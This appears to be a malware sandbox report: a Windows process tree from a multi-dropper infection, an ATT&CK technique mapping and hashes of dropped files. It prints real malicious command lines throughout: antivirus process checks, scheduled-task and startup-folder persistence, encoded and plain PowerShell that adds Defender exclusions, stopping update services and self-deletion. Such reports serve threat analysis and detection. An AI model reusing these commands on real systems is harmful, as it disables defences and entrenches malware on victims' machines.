C:\Windows\SysWOW64\findstr.exefindstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"5⤵PID:12572
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 3859025⤵PID:13100
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "VECOVERAGEGATESOCCURRING" Scottish5⤵PID:12976
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Dirt + ..\Contacts + ..\Syria + ..\Gross + ..\Ministry + ..\Infected + ..\Trout + ..\Reforms + ..\Highlighted + ..\Mas + ..\Rotary + ..\Preston + ..\Remove + ..\Clock + ..\Liquid + ..\Isa + ..\Cape d5⤵PID:14020
-
-
C:\Users\Admin\AppData\Local\Temp\385902\But.pifBut.pif d5⤵PID:8212
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "TradeSwan" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TradeOptimize Solutions\TradeSwan.js'" /sc onlogon /F /RL HIGHEST6⤵
- Scheduled Task/Job: Scheduled Task
PID:17156
-
-
C:\Users\Admin\AppData\Local\Temp\385902\But.pifC:\Users\Admin\AppData\Local\Temp\385902\But.pif6⤵PID:7416
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\385902\But.pif" & rd /s /q "C:\ProgramData\CFBFCGIDAKEC" & exit7⤵PID:16172
-
C:\Windows\SysWOW64\timeout.exetimeout /t 108⤵
- Delays execution with timeout.exe
PID:18340
-
-
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 155⤵PID:17144
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\bqkriy6l.exe"C:\Users\Admin\AppData\Local\Temp\a\bqkriy6l.exe"3⤵PID:8244
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:15368
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe"Powershell" Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\bqkriy6l.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\frameApp_consoleMode.exe'4⤵PID:10892
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\7cl16anh.exe"C:\Users\Admin\AppData\Local\Temp\a\7cl16anh.exe"3⤵PID:6224
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Impacts Impacts.bat & Impacts.bat4⤵PID:1640
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:10476
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"5⤵PID:11440
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:13832
-
-
C:\Windows\SysWOW64\findstr.exefindstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"5⤵PID:17344
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 5786785⤵PID:17092
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "PEACEFOLKSEXUALISLANDS" Hill5⤵PID:17116
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Webpage + ..\Von + ..\Exotic + ..\Relief + ..\Seo + ..\Serious + ..\Myth y5⤵PID:7972
-
-
C:\Users\Admin\AppData\Local\Temp\578678\Cooper.pifCooper.pif y5⤵PID:7488
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵PID:17272
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\uctgkfb7.exe"C:\Users\Admin\AppData\Local\Temp\a\uctgkfb7.exe"3⤵PID:6396
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows" /tr "C:\Users\Admin\Windows.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:15788
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\f86nrrc6.exe"C:\Users\Admin\AppData\Local\Temp\a\f86nrrc6.exe"3⤵PID:10804
-
-
C:\Users\Admin\AppData\Local\Temp\a\AllNew.exe"C:\Users\Admin\AppData\Local\Temp\a\AllNew.exe"3⤵PID:15400
-
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"4⤵PID:11444
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\ev.exe"C:\Users\Admin\AppData\Local\Temp\a\ev.exe"3⤵PID:10648
-
-
C:\Users\Admin\AppData\Local\Temp\a\ConsoleApp2.exe"C:\Users\Admin\AppData\Local\Temp\a\ConsoleApp2.exe"3⤵PID:15856
-
-
C:\Users\Admin\AppData\Local\Temp\a\ngrok.exe"C:\Users\Admin\AppData\Local\Temp\a\ngrok.exe"3⤵PID:12880
-
-
C:\Users\Admin\AppData\Local\Temp\a\VmManagedSetup.exe"C:\Users\Admin\AppData\Local\Temp\a\VmManagedSetup.exe"3⤵PID:15232
-
-
C:\Users\Admin\AppData\Local\Temp\a\3yh8gdte.exe"C:\Users\Admin\AppData\Local\Temp\a\3yh8gdte.exe"3⤵PID:7664
-
-
C:\Users\Admin\AppData\Local\Temp\a\6nteyex7.exe"C:\Users\Admin\AppData\Local\Temp\a\6nteyex7.exe"3⤵PID:8036
-
C:\Users\Admin\AppData\Local\Temp\a\6nteyex7.exe"C:\Users\Admin\AppData\Local\Temp\a\6nteyex7.exe"4⤵PID:15072
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 2764⤵
- Program crash
PID:16836
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\jb4w5s2l.exe"C:\Users\Admin\AppData\Local\Temp\a\jb4w5s2l.exe"3⤵PID:8168
-
C:\Users\Admin\AppData\Local\Temp\a\jb4w5s2l.exe"C:\Users\Admin\AppData\Local\Temp\a\jb4w5s2l.exe"4⤵PID:17236
-
-
C:\Users\Admin\AppData\Local\Temp\a\jb4w5s2l.exe"C:\Users\Admin\AppData\Local\Temp\a\jb4w5s2l.exe"4⤵PID:7744
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8168 -s 3124⤵
- Program crash
PID:13708
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\j4vzzuai.exe"C:\Users\Admin\AppData\Local\Temp\a\j4vzzuai.exe"3⤵PID:7436
-
C:\Users\Admin\AppData\Local\Temp\a\j4vzzuai.exe"C:\Users\Admin\AppData\Local\Temp\a\j4vzzuai.exe"4⤵PID:6536
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7436 -s 3244⤵
- Program crash
PID:13788
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\TigerHulk3.exe"C:\Users\Admin\AppData\Local\Temp\a\TigerHulk3.exe"3⤵PID:10532
-
-
C:\Users\Admin\AppData\Local\Temp\a\osupdater.exe"C:\Users\Admin\AppData\Local\Temp\a\osupdater.exe"3⤵PID:11304
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"4⤵PID:10856
-
-
C:\Windows\system32\audiodg.exe"C:\Windows\system32\audiodg.exe"4⤵PID:10768
-
-
C:\Windows\system32\msiexec.exe"C:\Windows\system32\msiexec.exe"4⤵PID:11152
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\si.exe"C:\Users\Admin\AppData\Local\Temp\a\si.exe"3⤵PID:10772
-
-
C:\Users\Admin\AppData\Local\Temp\a\c1.exe"C:\Users\Admin\AppData\Local\Temp\a\c1.exe"3⤵PID:15164
-
-
C:\Users\Admin\AppData\Local\Temp\a\c2.exe"C:\Users\Admin\AppData\Local\Temp\a\c2.exe"3⤵PID:7240
-
-
C:\Users\Admin\AppData\Local\Temp\a\sam.exe"C:\Users\Admin\AppData\Local\Temp\a\sam.exe"3⤵PID:17404
-
-
C:\Users\Admin\AppData\Local\Temp\a\c3.exe"C:\Users\Admin\AppData\Local\Temp\a\c3.exe"3⤵PID:17924
-
-
C:\Users\Admin\AppData\Local\Temp\a\msf.exe"C:\Users\Admin\AppData\Local\Temp\a\msf.exe"3⤵PID:13704
-
-
C:\Users\Admin\AppData\Local\Temp\a\s.exe"C:\Users\Admin\AppData\Local\Temp\a\s.exe"3⤵PID:11668
-
-
C:\Users\Admin\AppData\Local\Temp\a\st.exe"C:\Users\Admin\AppData\Local\Temp\a\st.exe"3⤵PID:14380
-
-
C:\Users\Admin\AppData\Local\Temp\a\gdn5yfjd.exe"C:\Users\Admin\AppData\Local\Temp\a\gdn5yfjd.exe"3⤵PID:16300
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYQBcAGcAZABuADUAeQBmAGoAZAAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABhAFwAZwBkAG4ANQB5AGYAagBkAC4AZQB4AGUAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABUAHkAcABlAEkAZAAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABUAHkAcABlAEkAZAAuAGUAeABlAA==4⤵PID:10040
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\kmvcsaed.exe"C:\Users\Admin\AppData\Local\Temp\a\kmvcsaed.exe"3⤵PID:16732
-
-
C:\Users\Admin\AppData\Local\Temp\a\valid.exe"C:\Users\Admin\AppData\Local\Temp\a\valid.exe"3⤵PID:12296
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\B0s53.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\B0s53.exe4⤵PID:13432
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\T5h09.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\T5h09.exe5⤵PID:9832
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1t88s7.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1t88s7.exe6⤵PID:6880
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"7⤵PID:10048
-
C:\Users\Admin\AppData\Local\Temp\1007319001\rodda.exe"C:\Users\Admin\AppData\Local\Temp\1007319001\rodda.exe"8⤵PID:8604
-
-
C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe"C:\Users\Admin\AppData\Local\Temp\1007944001\L.exe"8⤵PID:15820
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2k5210.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2k5210.exe6⤵PID:10820
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3a36L.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3a36L.exe5⤵PID:14920
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4J089A.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\4J089A.exe4⤵PID:6640
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\feb9sxwk.exe"C:\Users\Admin\AppData\Local\Temp\a\feb9sxwk.exe"3⤵PID:6320
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c start "" "C:\Users\Admin\AppData\Local\Temp\a\curlapp64.exe"4⤵PID:8256
-
C:\Users\Admin\AppData\Local\Temp\a\curlapp64.exe"C:\Users\Admin\AppData\Local\Temp\a\curlapp64.exe"5⤵PID:8844
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\Admin\AppData\Local\Temp\a\feb9sxwk.exe"4⤵PID:8656
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak5⤵
- Delays execution with timeout.exe
PID:10708
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\myrdx.exe"C:\Users\Admin\AppData\Local\Temp\a\myrdx.exe"3⤵PID:16528
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:16464
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 16528 -s 2644⤵
- Program crash
PID:12848
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\18ijuw13.exe"C:\Users\Admin\AppData\Local\Temp\a\18ijuw13.exe"3⤵PID:17068
-
C:\Users\Admin\AppData\Local\Temp\a\18ijuw13.exe"C:\Users\Admin\AppData\Local\Temp\a\18ijuw13.exe"4⤵PID:7684
-
-
C:\Users\Admin\AppData\Local\Temp\a\18ijuw13.exe"C:\Users\Admin\AppData\Local\Temp\a\18ijuw13.exe"4⤵PID:12872
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 17068 -s 2844⤵
- Program crash
PID:15004
-
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & echo URL="C:\Users\Admin\AppData\Local\CyberSphere Dynamics\ZeusChat.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url" & exit2⤵
- Drops startup file
PID:3180
-
-
C:\Users\Admin\AppData\Local\Temp\E010.tmp.x.exe"C:\Users\Admin\AppData\Local\Temp\E010.tmp.x.exe"2⤵PID:12560
-
-
C:\Users\Admin\AppData\Local\Temp\E929.tmp.zx.exe"C:\Users\Admin\AppData\Local\Temp\E929.tmp.zx.exe"2⤵PID:17436
-
C:\Users\Admin\AppData\Local\Temp\E929.tmp.zx.exe"C:\Users\Admin\AppData\Local\Temp\E929.tmp.zx.exe"3⤵
- Loads dropped DLL
PID:16364
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3496
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3872
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3944
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4020
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:4064
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4296
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4444
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:4784
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:2080
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:5064
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
PID:408
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:1452
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2524
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2476
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:1232
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵PID:1524
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4232 -ip 42322⤵PID:2960
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1496 -ip 14962⤵PID:1820
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
PID:3384
-
C:\ProgramData\Mig\Mig.exeC:\ProgramData\Mig\Mig.exe1⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:4060 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3660 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5420
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:5576
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:5696
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:5588
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:5684
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:5732
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:5812
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:5892 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5912
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
PID:6080 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3700
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
PID:6096 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4420
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
PID:6104 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2264
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
PID:6116 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5344
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:6136
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe2⤵PID:1220
-
-
C:\Windows\system32\dialer.exedialer.exe2⤵PID:5168
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:2008 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 436 -p 2072 -ip 20722⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:1880
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:1880
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:11800 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 11832 -ip 118322⤵PID:6356
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3340 -ip 33402⤵PID:17576
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 12232 -ip 122322⤵PID:8420
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 604 -p 8068 -ip 80682⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:17172
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 580 -p 7272 -ip 72722⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:12444
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 13484 -ip 134842⤵PID:14124
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 8168 -ip 81682⤵PID:16208
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 7436 -ip 74362⤵PID:4884
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 8036 -ip 80362⤵PID:2184
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 16528 -ip 165282⤵PID:6308
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 17068 -ip 170682⤵PID:8112
-
-
C:\Windows\SysWOW64\Gwogw.exeC:\Windows\SysWOW64\Gwogw.exe -auto1⤵PID:11212
-
C:\Windows\SysWOW64\Gwogw.exeC:\Windows\SysWOW64\Gwogw.exe -acsi2⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Suspicious behavior: LoadsDriver
PID:5008
-
-
C:\Windows\nwdzwk.exeC:\Windows\nwdzwk.exe1⤵
- Checks processor information in registry
PID:1392
-
C:\ProgramData\gaeucrwzinlx\bbwduuyjdzsp.exeC:\ProgramData\gaeucrwzinlx\bbwduuyjdzsp.exe1⤵
- Suspicious use of SetThreadContext
PID:7132 -
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:7196
-
C:\ProgramData\gaeucrwzinlx\bbwduuyjdzsp.exe"C:\ProgramData\gaeucrwzinlx\bbwduuyjdzsp.exe"3⤵
- Suspicious use of SetThreadContext
PID:12900 -
C:\Windows\system32\svchost.exesvchost.exe4⤵PID:13208
-
-
-
-
C:\Windows\system32\svchost.exesvchost.exe2⤵PID:7272
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7272 -s 1963⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:15160
-
-
-
C:\ProgramData\ztngybkovyeb\qsjxfirefkza.exeC:\ProgramData\ztngybkovyeb\qsjxfirefkza.exe1⤵
- Suspicious use of SetThreadContext
PID:8180 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
PID:14088 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:14796
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
PID:12888 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:14680
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
PID:14256 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:14360
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
PID:12932 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:15792
-
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:14264
-
-
C:\Windows\explorer.exeexplorer.exe2⤵PID:14316
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2JavaScript
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
2Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
2Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
1Indicator Removal
3Clear Windows Event Logs
1File Deletion
1Network Share Connection Removal
1Modify Registry
5Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
3Credentials In Files
2Credentials in Registry
1Discovery
Network Service Discovery
3Network Share Discovery
1Peripheral Device Discovery
2Process Discovery
1Query Registry
9Remote System Discovery
2System Information Discovery
7System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6B
MD59fc3796ee0d2bb42d79fe1b5ce106122
SHA1d15d023df3c9ee8d1306488308f20bb571e5b89c
SHA25641fdbb429f5f3a0c95ab831c845b5102a7d64762d6b4b8aebea8ff764183ddd4
SHA51234fee1699f6be54eb867bd8f208c9b003ec57754236caf8d355e5be508d3e2003606c2b29ca60760b97848fda499bb13ae8656901365bfad2dcacf367c009c21
-
Filesize
4.1MB
MD53e5665842edf692c5da51975bea8be54
SHA1df865efaaa7de117b983588fefd7474053cf3bff
SHA25621e988aa820894faeb5f57171734501a444be9ac2758a2b17bcc9a4b677ba495
SHA51275b721cb68c254c6ba26d82cbbb38ace5928a386d5428f651e56734a1a70de55c315378e8bc2d95b26f90b51095229e1ce5f239c177dff1204e31d18cc4a486d
-
Filesize
44KB
MD54281b5461ba14bd8d120b72d4c7e12aa
SHA1ce0dc0fa3daead9d9cf8d97699144118af68c91c
SHA2564d1c2ad91414be21420eea26ab49e3583e9d7ded659f969d3a23909c8ce17810
SHA512a7dc39d25f6c2fb6ea09e2037b5cb95d6141698d5f7051ccb84d1742c20e43520e795f718fa1d1196007e764a05d893d57f8ac6f23df0a18da40cc7b738291a2
-
Filesize
95KB
MD593d6bdf913cab64fec58c765afdba3d4
SHA1ea2aa579723c407e944edca127e0850e349c8011
SHA256d525c300a08bb594ee6e385d1c145d857935ed0303a534fcb47dc1637d2f03c6
SHA51254bd792b65d01bd8b1b1aa43c3cbd20e0028966a264b1d117660acb279587b92a903ac7c82e66a35265644dde212179a9406fec756ca2da239f228459a4b73e4
-
Filesize
1.0MB
MD5c63860691927d62432750013b5a20f5f
SHA103678170aadf6bab2ac2b742f5ea2fd1b11feca3
SHA25669d2f1718ea284829ddf8c1a0b39742ae59f2f21f152a664baa01940ef43e353
SHA5123357cb6468c15a10d5e3f1912349d7af180f7bd4c83d7b0fd1a719a0422e90d52be34d9583c99abeccdb5337595b292a2aa025727895565f3a6432cab46148de
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
